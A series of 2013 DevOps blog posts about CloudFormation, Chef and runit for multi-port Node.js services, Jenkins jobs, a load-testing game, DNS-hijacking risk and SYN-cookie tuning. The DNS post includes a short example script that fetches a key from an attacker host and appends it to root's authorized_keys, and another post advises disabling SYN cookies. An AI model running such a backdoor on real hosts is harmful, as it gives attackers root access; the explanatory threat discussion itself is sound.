Saturday, November 9, 2013

Running single-threaded applications like a boss using CloudFormation and Chef.

NodeJS + CF + Chef = Unicorn Awesomeness!!

The problem statement is this: how do I make good use of a single-threaded application in the cloud?  The same question comes up with technologies like Redis, which accomplish a very direct, targeted objective in a "weird" kind of way.  Redis is also single-threaded, but its focus is on really, really fast indexing of structured data.  In the case of Node it makes sense to run many instances of the runtime on a single compute resource, thus using more of the system's resources to get more work done.

I'm using a formula of n+1, where n is the number of ECPUs; an m1.large instance in AWS has 2 ECPUs.  The goal is to find an automated path to running the cloudrim-api on many ports of a single compute instance, then load balancing the incoming requests across an array of ELBs, each ELB attached to a separate backend port but the same group of nodes, while maintaining that all traffic coming into any given ELB is always on port 9000.
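
As a quick illustration of the formula ( a sketch; the port range is an assumption that matches the Chef recipe further down ):

# Count the CPUs the instance exposes, add one; that's how many cloudrim-api
# processes ( and therefore backend ports ) the box will run.
NUM_CPUS=$(grep -c ^processor /proc/cpuinfo)
NUM_PROCS=$((NUM_CPUS + 1))
echo "Running ${NUM_PROCS} processes on ports 9000 through $((9000 + NUM_PROCS - 1))"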

High-level summary

This is creating several AWS objects:

  • A security group for the load balancers that only allows traffic in on port 9000.
  • One Elastic Load Balancer object per backend port; each ELB listens on port 9000 but directs traffic to a different port ( 9000, 9001, and so on ) on the targets.
  • Each ELB gets its own DNS alias record.
  • A regional DNS entry built as a Route53 weighted record set, with one weighted entry pointing at each ELB's alias.
The magic is in the last step: what we end up with is an endpoint, cloudrim.us-east-1.opsautohtc.net, which points at a weighted set of ELBs.  Each ELB points to a specific port on a collection of nodes; the collection of nodes is the same for every ELB, only the port differs.

This allows us to run many instances of a software package in a dynamic way ( more ECPUs will grow most of the system automatically ).  I'm combining this with runit for extra durability: runit ensures that the process is always running, so if the service crashes, runit will spin up a new instance almost immediately.


CloudFormation bits:

    "LoadBalancerSecurityGroup": {
      "Type": "AWS::EC2::SecurityGroup",
      "Properties": {
        "VpcId": { "Ref": "VpcId" },
        "GroupDescription": "Enable HTTP access on port 9080",
        "SecurityGroupIngress": [
          { "IpProtocol": "tcp", "FromPort": "9000", "ToPort": "9000", "CidrIp": "0.0.0.0/0" }
        ],
        "SecurityGroupEgress": [ ]
      }
    },
    "ElasticLoadBalancer0": {
      "Type": "AWS::ElasticLoadBalancing::LoadBalancer",
      "Properties": {
        "Subnets": [{ "Ref": "PrivateSubnetId" }],
        "Scheme": "internal",
        "Listeners": [{ "LoadBalancerPort": "9000", "InstancePort": "9000", "Protocol": "TCP" }],
        "HealthCheck": {
          "Target": "TCP:9000",
          "Timeout": "2",
          "Interval": "20",
          "HealthyThreshold": "3",
          "UnhealthyThreshold": "5"
        },
        "SecurityGroups": [{ "Ref": "LoadBalancerSecurityGroup" }]
      }
    },
    "ElasticLoadBalancer1": {
      "Type": "AWS::ElasticLoadBalancing::LoadBalancer",
      "Properties": {
        "Subnets": [{ "Ref": "PrivateSubnetId" }],
        "Scheme": "internal",
        "Listeners": [{ "LoadBalancerPort": "9000", "InstancePort": "9001", "Protocol": "TCP" }],
        "HealthCheck": {
          "Target": "TCP:9001",
          "Timeout": "2",
          "Interval": "20",
          "HealthyThreshold": "3",
          "UnhealthyThreshold": "5"
        },
        "SecurityGroups": [{ "Ref": "LoadBalancerSecurityGroup" }]
      }
    },
    "DNSEntry0": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim0.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "A",
          "AliasTarget": {
            "DNSName": { "Fn::GetAtt": [ "ElasticLoadBalancer0", "DNSName" ] },
            "HostedZoneId": { "Fn::GetAtt": [ "ElasticLoadBalancer0", "CanonicalHostedZoneNameID" ] }
          }
        }]
      }
    },
    "DNSEntry1": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim1.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "A",
          "AliasTarget": {
            "DNSName": { "Fn::GetAtt": [ "ElasticLoadBalancer1", "DNSName" ] },
            "HostedZoneId": { "Fn::GetAtt": [ "ElasticLoadBalancer1", "CanonicalHostedZoneNameID" ] }
          }
        }]
      }
    },
    "RegionDNSEntry": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array0",
          "Weight": "30",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim0.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        },{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array1",
          "Weight": "40",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim1.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        },{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array2",
          "Weight": "30",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim2.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        }]
      }
    },
    "ConfigASG": {
      "Type": "AWS::AutoScaling::AutoScalingGroup",
      "Properties": {
        "Tags": [{ "Key": "DeploymentName", "Value": { "Ref": "DeploymentName" }, "PropagateAtLaunch": "true" }],
        "MinSize": { "Ref": "Min" },
        "MaxSize": { "Ref": "Max" },
        "DesiredCapacity": { "Ref": "DesiredCapacity" },
        "AvailabilityZones": [{ "Ref": "AvailabilityZone" }],
        "VPCZoneIdentifier": [{ "Ref": "PrivateSubnetId" }],
        "LoadBalancerNames": [
          { "Ref": "ElasticLoadBalancer0" },
          { "Ref": "ElasticLoadBalancer1" },
          { "Ref": "ElasticLoadBalancer2" }
        ],
        "LaunchConfigurationName": { "Ref": "ServiceLaunchConfig" }
      }
    }
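
None of this is tied to the console; the template can be validated and launched from the command line.  A rough sketch using the AWS CLI ( the file name, stack name, and parameter values here are assumptions; match them to your actual template ):

# Sanity-check the JSON before launching anything.
aws cloudformation validate-template --template-body file://cloudrim.json

# Launch the stack; every Ref in the snippet above ( VpcId, PrivateSubnetId, etc. )
# has to be supplied as a parameter.
aws cloudformation create-stack \
  --stack-name cloudrim-useast1 \
  --template-body file://cloudrim.json \
  --parameters ParameterKey=VpcId,ParameterValue=vpc-12345678 \
               ParameterKey=PrivateSubnetId,ParameterValue=subnet-12345678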

And now the Chef bits:

services = node["htc"]["services"] || [ "api" ]
Chef::Log.info( "SERVICES: %s" % services.inspect )
# n+1: one process per CPU reported by /proc/cpuinfo, plus one.
num_procs = `cat /proc/cpuinfo |grep processor|wc -l`.to_i + 1
Chef::Log.info( "NumProcs: %i" % num_procs )
num_procs.times do |i|
  port = 9000 + i
  Chef::Log.info( "PORT: %i" % port )
  runit_service "cloudrim-api%i" % i do
    action [ :enable, :start ]
    options({ :port => port })
    template_name "cloudrim-api"
    log_template_name "cloudrim-api"
  end
end
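
Once chef-client converges, each process shows up as its own runit service.  A quick sanity check ( a sketch, assuming three processes and the default /etc/service directory ):

sudo sv status cloudrim-api0 cloudrim-api1 cloudrim-api2
# Expect something like: run: cloudrim-api0: (pid 1234) 120s; run: log: (pid 1233) 120s
# Kill one of the node processes and a fresh pid should appear within a second or so.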

Template:

cat templates/default/sv-cloudrim-api-run.erb
#!/bin/sh
exec 2>&1
PORT=<%= @options[:port] %> exec chpst -uec2-user node /home/ec2-user/cloudrim/node.js
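
The log side is templated the same way.  A minimal sketch of what the log run script could look like ( the svlogd target is an assumption; runit's convention is to log into the service's own log/main directory ):

#!/bin/sh
# svlogd collects whatever the run script above writes to stdout/stderr and rotates it.
# ./main resolves per-service, so cloudrim-api0 and cloudrim-api1 keep separate logs.
exec svlogd -tt ./main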

Monday, November 4, 2013

Chef and Jenkins

I create Chef bits that create Jenkins build jobs.  This way I can "create the thing that creates the things."  I can reset the state of things by running rm -rf *-config.xml jobs/* on the Jenkins server, restarting Jenkins, then running chef-client; everything gets put back together automatically.  This also lets me change the jobs in real time, then reset everything when I'm done.
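
The reset cycle itself is just a handful of commands ( a sketch; the Jenkins data directory is the one the recipe below writes config.xml into, so adjust the path if yours differs ):

cd /var/lib/jenkins/jenkins-data    # assumed Jenkins data dir
rm -rf *-config.xml jobs/*          # throw away every generated job config
sudo service jenkins restart        # Jenkins comes back up empty
sudo chef-client                    # Chef recreates all of the jobs from the templates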

recipes/jenkins-builder.rb

pipelines = []
dashboards = []

region_name = "us-east-1"
domain_name = "opsautohtc.net"
deployment_name = "Ogashi"
pipelines.push({
  :name => "Launch %s" % deployment_name,
  :num_builds => 3,
  :description => "

Prism

  • Cloud: AWS
  • Region: us-east-1
  • Account: HTC CS DEV
  • Owner: Bryan Kroger ( bryan_kroger@htc.com )
",
  :refresh_freq => 3,
  :first_job_name => "CloudFormation.%s.%s.%s" % [deployment_name, region_name, domain_name],
  :build_view_title => "Launch %s" % deployment_name
})
cloudrim_battle_theater deployment_name do
  action :jenkins_cloud_formation
  az_name "us-east-1b"
  git_url "git@gitlab.dev.sea1.csh.tc:operations/deployments.git"
  region_name region_name
  domain_name domain_name
end
cloudrim_battle_theater deployment_name  do
  action :jenkins_exec_helpers
  az_name "us-east-1b"
  git_url "git@gitlab.dev.sea1.csh.tc:operations/deployments.git"
  region_name region_name
  domain_name domain_name
end
dashboards.push({ :name => deployment_name, :region_name => "us-east-1" })

template "/var/lib/jenkins/jenkins-data/config.xml" do
  owner "jenkins"
  group "jenkins"
  source "jenkins/config.xml.erb"
  #notifies :reload, "service[jenkins]"
  variables({ :pipelines => pipelines, :dashboards => dashboards })
end



cloudrim/providers/battle_theater.rb:

def action_jenkins_exec_helpers()
  region_name = new_resource.region_name
  domain_name = new_resource.domain_name
  deployment_name = new_resource.name

  proxy_url = "http://ops.prism.%s.int.%s:3128" % [region_name, domain_name]

  proxy = "HTTP_PROXY='%s' http_proxy='%s' HTTPS_PROXY='%s' https_proxy='%s'" % [proxy_url, proxy_url, proxy_url, proxy_url]

  job_name = "ExecHelper.chef-client.%s.%s.%s" % [deployment_name, region_name, domain_name]
  job_config = ::File.join(node[:jenkins][:server][:data_dir], "#{job_name}-config.xml")
  jenkins_job job_name do
    action :nothing
    config job_config
  end
  template job_config do
    owner "jenkins"
    group "jenkins"
    source "jenkins/htc_pssh_cmd.xml.erb"
    cookbook "opsauto"
    variables({
      #:cmd => "%s sudo chef-client -j /etc/chef/dna.json" % proxy, 
      :cmd => "%s sudo chef-client" % proxy,
      :hostname => "ops.prism",
      :domain_name => domain_name,
      :region_name => region_name,
      :deployment_name => deployment_name
    })
    notifies :update, resources(:jenkins_job => job_name), :immediately
  end

 [...]

end


Sunday, November 3, 2013

Great run...

We had a great first run of the BattleTheater today.  Release 0.0.9 fixes a ton of bugs relating to the engines.

I have found an absolutely brilliant way of running the nodejs services.  I have this in my services.rb recipe:

runit_service "cloudrim-kaiju" do
  log false
  if(services.include?( "kaiju" ))
    action [ :enable, :start ]
  else
    action [ :disable, :down, :stop ]
  end
end

I can run a variable number of nodejs services based on the contents of the node["htc"]["services"] array.

These runit services are templated, but basically I can run a service that does this:

node /home/ec2-user/cloudrim/engines/kaiju.js

And run the Kaiju Engine as its own process.  Runit takes care of making sure the service is always running, and I don't have to mess with init scripts!!
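
The generated run script for that engine ends up looking much like the api one in the post above ( a sketch, assuming the same chpst/ec2-user pattern ):

#!/bin/sh
exec 2>&1
# runit supervises this process; if kaiju.js crashes it is restarted immediately.
exec chpst -u ec2-user node /home/ec2-user/cloudrim/engines/kaiju.js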

Thank you #opscode !

How do I CloudRim?

Do something like this:

curl -XPOST -H "Content-Type: application/ajax" -d '{"email":"your.email@blah.com"}' Tanaki-cl-ElasticL-10851AT1WINID-1417527178.us-east-1.elb.amazonaws.com:9000/hq/battle

You'll get this back:

{"kaiju":{"hp":90.71948742261156,"xp":0,"str":7,"name":"Knifehead92","level":14,"armor":7,"speed":7,"bonuses":{"ice":0,"fire":0,"earth":0,"water":6},"category":3,"actor_type":"kaiju","_id":"5276b4d902b6008c0e00007d"},"jaeger":{"level":33,"_id":"5276b4d94a2ad64d0e00007a","hp":100,"name":"","weapons":{"left":{"ice":0,"fire":1,"earth":9,"water":0},"right":{"ice":5,"fire":9,"earth":1,"water":0}}}}


Friday, November 1, 2013

CloudRim

GitRepo

CloudRim is a little game I came up with to help people understand high-volume load and scaling techniques in AWS.

The idea here is that I launch a "Battle Theater" into an AWS region, let's say us-east-1 for example.  The BT is basically a MongoDB sharding rig with automatic sharding in place.  When the battle begins I will announce "The Kaiju have landed in USEast!!" and the battle will begin.

Most games are centered around the idea of keeping people off the server and doing as much local caching as possible.  This is not that, by a good long shot.  The idea of this game is to pound the absolute shit out of the server as hard and as fast as you can.  In fact, simply using ab or a script with some threading junk won't be enough.  Even running jmeter on a single box won't be enough.

The goal of this game is to destroy all Kaiju in existence, but the Rift keeps spawning new Kaiju at a fairly high rate.  The Jaegers are also spawned at a similar rate.

There are two winning scenarios in the game: either the Kaiju win and you suck, or the Apocalypse is canceled and the heroes win.

Every time you do battle with the server you are awarded a random number of XP between 1 and 10, so in order to be at the top of the charts you have to do as many battles as possible.

Now here's the catch: this entire game is built around the idea that great automation can do amazing things.  In order to prove this, the BT is only deployed for an hour.  This means that you have less than an hour to spin up your nodes and attack the server as hard and as fast as you possibly can.  Obviously this is going to require coordination on your part.

At the end of the game the scores are tallied up and the person at the top of the score chart is given the medal of honor or something.

The idea here is to give people a fun, engaging way of learning how automation works and why it's important.  It's also a great way to prove just how unbelievably awesome AWS really is.

Monday, October 7, 2013

DNS hacking paranoia

Every time I see a story like this, I freak out a little:

http://thehackernews.com/2013/10/worlds-largest-web-hosting-company_5.html

Long story short: DNS hijacking.

When we look at the cloud offering landscape we see cloud providers like Amazon, Rackspace, and Google, but there are also cloud management companies like RightScale and Scalr.  These cloud management companies will sometimes lay in their own custom software bits that aid in the configuration and management of a given compute resource.

In most cases ( and we can even include things like chef servers here as well ) the compute resource that is being managed will make a call out to the "control server" for instructions.  But how does it know which server to contact?  That's where DNS comes in, for example:

configuration.us-east-1.mycompany.com

Would be a DNS entry that actually points to:

cf-chef-01.stackName0.deploymentName0.regionName.domainName.TLD

The DNS eventually points to an IP, and the client makes the call.
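
In other words, the trust chain starts with a plain name lookup, something like this ( illustrative only; the names and address are made up to match the example above ):

dig +short configuration.us-east-1.mycompany.com
# cf-chef-01.stackName0.deploymentName0.regionName.domainName.TLD.
# 10.1.2.3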

If an attacker is able to hijack mycompany.com, they could point configuration.us-east-1 at their own IP address.  Most of these configuration management applications use some kind of authentication or validation to prove they are who they say they are.  In the case of Chef, API calls are signed with the client's private key and validated on the server side, which makes "man in the middle" attacks much more difficult.

In some cases the configuration management software simply makes a call to a worker queue that uses a basic username/password system.  In that case an attacker could wrap any generic worker queue with an "always pass authentication" switch so that the client always authenticates successfully.  That would allow them to control the client simply by injecting worker elements into the queue.

For example, we could create a worker element that runs the following script as root:

#!/bin/bash
# Pull down the attacker's public key and append it to root's authorized_keys,
# giving the attacker passwordless ssh access as root.
curl -o /tmp/tmp.cache.r1234 http://my.evil.domain.com/public_key
cat /tmp/tmp.cache.r1234 >> /root/.ssh/authorized_keys

This would work great for any node that isn't in a VPC and is attached to a public IP.  Other trickery could be used to extend the evilness of this hack, but the point is that if someone can execute something on the remote box as root, you're pretty well fucked.

This is why DNS hijacking stories scare me a little.

Friday, October 4, 2013

tcp syn flooding ... why does this keep happening?

Linux itself is just a kernel; all of the crap around the kernel, from bash to KDE, is considered part of the distro.  Linux distros come in many flavors, shapes and sizes.  This is beneficial to everyone, as it allows for a few generic "types" of distros that can then specialize with further customizations.  For example, Ubuntu is derived from the Debian base type.  Similarly, CentOS is derived from Red Hat Enterprise Linux.

The differences between CentOS and RHEL are mostly related to licensing and support.  Red Hat the company publishes, maintains and supports the Red Hat Enterprise Linux ( RHEL ) distribution.  Their product isn't Linux; it's the support and maintenance of the distribution built around Linux.  CentOS is not a product; it's maintained by the community according to their perfectly adequate community standards.

Amazon also makes its own AMI.  Their AMI is specifically designed to work in their EC2 environment.  The expectation is that this AMI will be used in a high-traffic environment.

When having a discussion about which distribution to go with, it's important to pay attention to the expectations of use.  These expectations aren't always as obvious as the expectations around the Amazon AMI.  Amazon is making its expectations very clear:

"the instance that you use with this AMI will take significant amounts of traffic from one or may sources"

This expectation is set by engineers who were paid large sums of money to ensure it is reflected in every decision made by the maintainers of the Amazon AMI.  Amazon pinned their reputation on this AMI and they use it in their own production environments; that tells me quite a bit about what went into making this distro happen.  They also support it as part of an enterprise support contract.  All of these facts make the Amazon AMI a very solid choice for cloud operations.

Other distros, like CentOS, are far less clear on their expectations.  For instance, CentOS seems to live in many worlds with no clear, specific role or specialization.  However, certain choices made by the maintainers can give us a general idea of what the intent might be.

For example, if a distro made a choice to, by default, protect the system from a type of attack known as a "SYN flood", you would see the following:

cat /proc/sys/net/ipv4/tcp_syncookies
1

This means that tcp_syncookies is enabled.  SYN cookies are a kernel-level mitigation for SYN flood attacks: when too many half-open connections pile up, the kernel stops tracking them normally and answers with specially crafted "cookie" SYN-ACKs instead.

This is a reasonable default for a desktop, but it's directly in contrast to how a server behind a load balancer is expected to behave, and it's exactly the opposite of what you want in a high-volume environment.

It's a very easy fix; in our case, all I had to do was add a single line to the startup script for the service nodes.

          "echo 0 > /proc/sys/net/ipv4/tcp_syncookies\n",

Easy peasy.
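
If you'd rather not rely on a boot-time echo, the same change can be made persistent through sysctl ( a sketch; same effect, it just survives reboots ):

# Disable SYN cookies now and on every boot.
echo "net.ipv4.tcp_syncookies = 0" >> /etc/sysctl.conf
sysctl -w net.ipv4.tcp_syncookies=0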

Here's what you would see in EC2 if you were using an ELB:

  1. Instances are fine; everything is in the "In Service" state.
  2. You run ab -n 10000 -c 500 http://your_host/hb
  3. About halfway through the test the ELB goes nuts and all of the instances end up in the "Out of Service" state.
  4. The application is fine, and from your side the operating system seems fine too ( you can ssh into the instance and telnet to the port works ), but from the perspective of the load balancer the box appears to be completely offline.
What's happening is that the box is basically being DDoS'd by the HAProxy instances that make up the ELB.  This type of mitigation is only useful on desktops; in the cloud, or in any professionally built data center, it's usually handled at other points upstream.
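
If you want to confirm that this is what's happening before flipping the setting, a couple of quick checks on the instance ( the exact kernel message wording varies between kernel versions ):

dmesg | grep -i "syn flood"        # the kernel logs when it starts sending cookies
netstat -ant | grep -c SYN_RECV    # half-open connections piling up during the ab run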

I remember writing about this many years ago while working at Deep Rock Drive; I'm just astonished that we still see this today in professional environments.